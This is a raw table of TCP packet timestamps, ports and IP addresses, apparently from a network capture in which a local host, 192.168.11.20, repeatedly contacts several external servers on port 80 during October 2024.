                                                                                                                                              Oct 4, 2024 08:07:19.353787899 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.362390041 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.463884115 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:20.383410931 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:20.383565903 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:20.869484901 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:20.970730066 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:21.886928082 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:21.988404989 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:21.988658905 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:21.996279955 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:22.097651005 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:22.100203991 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:22.100362062 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:23.509594917 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:23.611105919 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.527306080 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.626372099 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.626535892 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.634145975 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.634196043 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.634243965 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.733402967 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733589888 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733870029 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733897924 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733913898 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733931065 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.733966112 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.735496044 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.735594988 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:26.149666071 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:26.249007940 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.166894913 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.267810106 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.267992020 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.273075104 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.374353886 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.376599073 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.376672983 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.377022982 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.378856897 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.383356094 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:27.383622885 CEST4973580192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:27.480122089 CEST80497353.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:32.501898050 CEST4973680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:32.601068020 CEST80497363.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:32.601246119 CEST4973680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:32.609239101 CEST4973680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:32.708508968 CEST80497363.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:32.714804888 CEST80497363.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:32.714937925 CEST4973680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:34.116524935 CEST4973680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:34.215806007 CEST80497363.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:35.133953094 CEST4973780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:35.233222961 CEST80497373.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:35.233398914 CEST4973780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:35.240950108 CEST4973780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:35.344640017 CEST80497373.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:36.756611109 CEST4973780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:36.903664112 CEST80497373.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.774012089 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:37.873140097 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.873284101 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:37.880976915 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:37.881028891 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:37.881047964 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:37.980257988 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.980698109 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.980781078 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.980912924 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.981025934 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.981419086 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:37.981652975 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:38.277589083 CEST80497373.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:38.277754068 CEST4973780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:38.893618107 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:38.893738985 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:39.396606922 CEST4973880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:39.495758057 CEST80497383.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.414076090 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.513405085 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.513617992 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.522816896 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.622128010 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.629918098 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.629930973 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.630217075 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.632097006 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.634037018 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:40.634279966 CEST4973980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:40.733258963 CEST80497393.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:45.847189903 CEST4974080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:45.947911978 CEST804974084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:45.948126078 CEST4974080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:45.955713034 CEST4974080192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:46.055315971 CEST804974084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:46.055335999 CEST804974084.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:48.475012064 CEST4974180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:48.574991941 CEST804974184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:48.575182915 CEST4974180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:48.583812952 CEST4974180192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:48.684576035 CEST804974184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:48.685033083 CEST804974184.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:51.116677999 CEST4974280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:51.217690945 CEST804974284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:51.217828035 CEST4974280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:51.232670069 CEST4974280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:51.232721090 CEST4974280192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:51.333436966 CEST804974284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:51.333528042 CEST804974284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:51.333537102 CEST804974284.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.754859924 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.854852915 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.855029106 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.860101938 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.959551096 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960364103 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960510969 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960628033 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960762024 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960838079 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.960921049 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960938931 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.960980892 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.960994005 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.961090088 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.961100101 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:53.961199045 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.961251020 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:53.964059114 CEST4974380192.168.11.2084.32.84.32
                                                                                                                                              Oct 4, 2024 08:07:54.063626051 CEST804974384.32.84.32192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:59.227209091 CEST4974480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:07:59.381344080 CEST804974454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:59.381510973 CEST4974480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:07:59.389911890 CEST4974480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:07:59.544625998 CEST804974454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:59.544698954 CEST804974454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:59.544709921 CEST804974454.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:59.544843912 CEST4974480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:00.891882896 CEST4974480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:01.909257889 CEST4974580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:02.062786102 CEST804974554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:02.062971115 CEST4974580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:02.070502996 CEST4974580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:02.224484921 CEST804974554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:02.224946022 CEST804974554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:02.224957943 CEST804974554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:02.225107908 CEST4974580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:03.578753948 CEST4974580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.596157074 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.749895096 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.750108957 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.757848978 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.757869959 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.757919073 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:04.911768913 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.911850929 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.911897898 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.911942959 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.911984921 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.912025928 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.912067890 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.912288904 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.912347078 CEST804974654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:04.912589073 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:06.265759945 CEST4974680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.283021927 CEST4974780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.444344997 CEST804974754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:07.444477081 CEST4974780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.449577093 CEST4974780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.603744984 CEST804974754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:07.603869915 CEST804974754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:07.603921890 CEST804974754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:07.604178905 CEST4974780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.606044054 CEST4974780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:08:07.770136118 CEST804974754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:12.955352068 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:13.195022106 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.195188046 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:13.202764988 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:13.442267895 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.451306105 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.451351881 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.451364994 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.451375961 CEST8049748194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:13.451544046 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:13.451544046 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:13.451544046 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:14.717103004 CEST4974880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:15.735543966 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:16.048722982 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.048860073 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:16.056535006 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:16.369760990 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370129108 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370234966 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370281935 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370333910 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370452881 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:16.370609045 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:17.560038090 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.577482939 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.812299967 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:18.812541962 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820250988 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820318937 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820332050 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055071115 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055139065 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055237055 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055274963 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055412054 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055522919 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055752993 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055816889 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055830002 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055921078 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055999041 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.290141106 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.290174007 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.290297031 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:20.325067043 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.342545986 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.568346977 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.568557024 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.573641062 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.799113989 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799434900 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799576044 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799711943 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799779892 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799798965 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.799850941 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799906969 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799927950 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799958944 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.800012112 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.800057888 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.800211906 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.802138090 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:22.027919054 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:26.915813923 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.211916924 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.212088108 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.220604897 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.522317886 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.522332907 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.522344112 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.522500038 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:28.729435921 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:29.746896982 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.054075003 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.054208994 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.061762094 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:30.383567095 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383661985 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383673906 CEST804975338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:30.383804083 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:31.572616100 CEST4975380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.593471050 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.895715952 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:32.895852089 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.904025078 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:32.904107094 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:33.204977036 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205120087 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205219984 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205321074 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205699921 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.205710888 CEST804975438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:33.206346989 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:34.415692091 CEST4975480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.433118105 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.738332033 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:35.738575935 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:35.743563890 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.050376892 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.133718967 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.133734941 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:36.134021997 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.135947943 CEST4975580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:36.440352917 CEST804975538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:41.328427076 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.427876949 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:41.428152084 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.435738087 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:41.535540104 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:42.464061022 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:42.464191914 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:42.945103884 CEST4975680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:43.044286966 CEST80497563.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:43.962507010 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.062285900 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.062469959 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.070035934 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:44.169867992 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.171840906 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:44.171972990 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:45.585139036 CEST4975780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:45.684637070 CEST80497573.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:46.602581024 CEST4975880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:46.701869965 CEST80497583.33.130.190192.168.11.20
